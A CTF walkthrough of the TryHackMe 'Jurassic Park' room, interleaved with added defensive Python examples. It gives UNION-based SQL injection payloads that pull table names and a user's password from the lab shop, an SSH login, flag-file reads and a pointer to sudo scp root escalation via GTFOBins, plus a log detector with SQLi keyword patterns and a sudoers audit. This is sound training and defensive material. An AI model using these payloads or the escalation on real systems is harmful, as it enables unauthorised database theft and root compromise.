Jurassic Park Tryhackme writeup
By Shamsher khan This is a Writeup of Tryhackme room “Jurassic Park”
Room link: https://tryhackme.com/room/jurassicpark
Note: This room is available only to users who have purchased a TryHackMe premium membership.
Alright, enough of BS. Time to get our work done. Similar to the Rick and Morty room, this Jurassic Park room also involves SQL injection. I had a hard time solving this room, but thanks to user Darkstar I was able to complete it. Let's get started, shall we?
Task 1.
nmap -sV 10.10.124.130
We found two open ports in the Nmap result: port 22 (SSH) and port 80 (HTTP). Let's check port 80 first.
Let's visit the online shop.
Looks like we can do something with the URL parameter. How about basic SQL injection?
I am going to change the parameter ?id= from 0 to 5 and see what other pages it brings up.
?id=0 — No results found
?id=1 — Gold package
?id=2 — Bronze package
?id=3 — Basic package
?id=4 — No results found
?id=5 — Development package (Interesting)
Looks like we have a user Dennis, and we still have a chance at performing SQLi, but not with the filtered characters and text. This time we are going to use UNION. For your information, a UNION-based SQLi requires a small brute-force on the number of columns: the injected SELECT must return exactly as many columns as the original query. After a short investigation, we can perform the attack using five columns.
Now you can see that the columns reflected in the page are 2, 4 and 5, so we can fetch information through these three columns.
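From the defender's side, the probing described above (stepping through ?id= values, then UNION SELECT with a growing column list, then information_schema lookups) leaves a very recognisable trail in the web server access log. The following added example is not part of the original write-up; it parses a few constructed Apache-style log lines (the /shop.php path, client IPs and timestamps are assumptions) and flags requests whose decoded parameter values contain UNION/information_schema keywords or a non-integer value for a parameter that should be numeric.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format). The /shop.php path,
# client addresses and timestamps are assumptions for this example, not from the room.
SAMPLE_LOG = """\
10.0.0.7 - - [10/Oct/2023:10:00:01 +0000] "GET /shop.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2023:10:00:02 +0000] "GET /shop.php?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2023:10:00:03 +0000] "GET /shop.php?id=1%20union%20select%201,2,3,4,5 HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2023:10:00:04 +0000] "GET /shop.php?id=1%20union%20select%201,2,3,group_concat(table_name),5%20from%20information_schema.tables HTTP/1.1" 200 702 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:10:00:05 +0000] "GET /shop.php?id=3 HTTP/1.1" 200 501 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:10:00:06 +0000] "GET /shop.php?id=abc HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [timestamp], "METHOD path proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Keywords typical of UNION-based enumeration; matched against URL-decoded values.
SQLI_RE = re.compile(
    r'\b(union\s+(?:all\s+)?select|information_schema|group_concat|@@version)\b', re.I
)
# Parameters the application only ever uses as integers (assumption for the shop page).
NUMERIC_PARAMS = {"id"}


def parse_line(line):
    """Return the client IP, path, decoded query parameters and status, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("path"))
    return {
        "ip": m.group("ip"),
        "path": parts.path,
        "params": parse_qs(parts.query, keep_blank_values=True),  # parse_qs URL-decodes values
        "status": int(m.group("status")),
    }


def inspect_request(req):
    """List the reasons a request looks like SQL injection probing (empty list = clean)."""
    reasons = []
    for name, values in req["params"].items():
        for value in values:
            if SQLI_RE.search(value):
                reasons.append(f"SQL keyword in {name}")
            if name in NUMERIC_PARAMS and not value.strip().lstrip("-").isdigit():
                reasons.append(f"non-integer value for {name}")
    return reasons


def flag_requests(log_text):
    """Run the checks over every parsable line and keep the suspicious ones."""
    flagged = []
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        reasons = inspect_request(req)
        if reasons:
            flagged.append({"ip": req["ip"], "path": req["path"], "reasons": reasons})
    return flagged


def hits_per_ip(flagged):
    """Count flagged requests per client, which is what you would alert or rate-limit on."""
    return Counter(f["ip"] for f in flagged)


if __name__ == "__main__":
    hits = flag_requests(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["path"], "; ".join(h["reasons"]))
    print(hits_per_ip(hits))
```

The keyword rule catches the enumeration stage; the "non-integer value" rule is the cheaper and more general signal, because it fires on the very first malformed ?id= regardless of which SQL syntax is used, at the cost of also flagging plain typos like id=abc.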
Question 1. What is the SQL database called which is serving the shop information?
park
Question 2. How many columns does the table have?
5
Question 3. What's the system version?
ubuntu 16.04
To fetch the tables from the database we can use the query:
?id=1 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema = database()
We can see that we have two tables: items and users.
Now fetch the column names of the users table from the database:
?id=1 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_schema = database() and table_name = "users"
We already know the username is dennis, so it's time to fetch the password:
?id=5 union select 1,2,3,password,5 from users
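The reason the payloads above work is that the shop builds its SQL statement by gluing the raw ?id= value into the query string. This added example (not code from the room or the write-up) shows that pattern beside the fix: an in-memory SQLite database stands in for the room's MySQL "park" database (so information_schema and database() are not available, and the table layout is an assumption modelled on the write-up), and the same UNION payload is run through a concatenating lookup and through a validated, parameterised one.

```python
import sqlite3

# Constructed in-memory stand-in for the shop database. The room runs MySQL; SQLite is
# used here only so the example runs offline. The items table has five columns to match
# the write-up, and the password value is a labelled placeholder, not real data.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items (id INTEGER, name TEXT, price INTEGER, description TEXT, category TEXT);
        INSERT INTO items VALUES (1, 'Gold package', 900, 'Full access', 'premium');
        INSERT INTO items VALUES (2, 'Bronze package', 300, 'Limited access', 'standard');
        INSERT INTO items VALUES (5, 'Development package', 0, 'Internal test entry', 'dev');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'dennis', 'CONSTRUCTED_PLACEHOLDER_HASH');
    """)
    return conn


ITEM_QUERY = "SELECT id, name, price, description, category FROM items WHERE id = "


def lookup_vulnerable(conn, id_param):
    """Vulnerable: the ?id= value is concatenated into the SQL, so 'union select' is parsed as SQL."""
    return conn.execute(ITEM_QUERY + id_param).fetchall()


def lookup_safe(conn, id_param):
    """Hardened: enforce the expected type, then bind the value; it can never become SQL syntax."""
    try:
        item_id = int(id_param)
    except (TypeError, ValueError):
        return []  # reject anything that is not an integer instead of passing it through
    return conn.execute(ITEM_QUERY + "?", (item_id,)).fetchall()


def leaks_password(rows):
    """True if any returned row carries the users.password placeholder."""
    return any("CONSTRUCTED_PLACEHOLDER_HASH" in str(row) for row in rows)


if __name__ == "__main__":
    conn = build_db()
    payload = "5 union select 1,2,3,password,5 from users"
    print("vulnerable:", lookup_vulnerable(conn, payload))  # item row plus the users row
    print("safe:      ", lookup_safe(conn, payload))        # [] - payload rejected
```

Parameter binding alone (passing the raw string as the bound value) would already stop the injection, because the driver sends the value separately from the statement; the int() check on top of it gives the application a place to log or reject malformed input rather than silently returning no rows.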
So it's time to get SSH on port 22:
ssh dennis@10.10.124.130
Flag 1.
Locate and get the first flag contents.
Flag 2.
Check the content of the .viminfo file, then read the file it points to:
cat /boot/grub/fonts/flagTwo.txt
Flag 3.
Flag 4.
There is no 4th flag.
Flag 5.
We guess the 5th flag can be accessed only by the root user, so it's time to become root.
An SCP, huh. Let's check the scp entry on GTFOBins.
Copy the line and escalate the privilege.
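The root step works because a sudo rule lets dennis run a file-transfer binary that GTFOBins lists as able to execute arbitrary commands. From the defender's side the fix is a sudoers review. This added example is not part of the write-up: it parses a constructed sudoers fragment (the room's actual rule is not shown on the page, so the dennis line is an assumption) and reports every non-root entry that grants ALL or a binary from a small, illustrative subset of GTFOBins entries.

```python
import re
from pathlib import PurePosixPath

# Constructed sudoers content. The dennis/scp line is an assumption standing in for
# whatever rule the room actually uses; it is not quoted from the box.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
dennis  ALL=(ALL) NOPASSWD: /usr/bin/scp
backup  ALL=(root) /usr/bin/id, /usr/bin/uptime
"""

# Illustrative subset of binaries whose sudo entries are equivalent to a root shell or
# arbitrary root file read/write (see GTFOBins). Not exhaustive: extend it for real audits.
SHELL_CAPABLE = {"scp", "vim", "vi", "find", "less", "more", "bash", "sh", "python3", "perl"}

# user  host = (runas) [TAG: ...] command[, command ...]
SUDOERS_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$'
)


def parse_sudoers(text):
    """Yield one dict per user/group rule; Defaults, comments and blank lines are skipped."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        yield {
            "user": m.group("user"),
            "runas": m.group("runas") or "root",
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "cmds": cmds,
        }


def audit_sudoers(text):
    """Return findings for non-root principals that can reach a shell or any command as root."""
    findings = []
    for rule in parse_sudoers(text):
        if rule["user"] == "root":
            continue  # root having sudo rights is expected
        for cmd in rule["cmds"]:
            binary = cmd.split()[0]
            if cmd == "ALL":
                reason = "may run any command"
            elif PurePosixPath(binary).name in SHELL_CAPABLE:
                reason = "binary can spawn a shell / read-write arbitrary files (GTFOBins)"
            else:
                continue
            findings.append({"user": rule["user"], "binary": binary,
                             "nopasswd": rule["nopasswd"], "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        pw = "NOPASSWD" if f["nopasswd"] else "password"
        print(f"{f['user']}: {f['binary']} ({pw}) - {f['reason']}")
```

Running the audit against the sample reports the %sudo group (any command) and dennis (scp without a password); the backup user's id and uptime entries pass. The same parser can be pointed at the files under /etc/sudoers.d/ one by one.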
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Thank you for taking the time to read my walkthrough.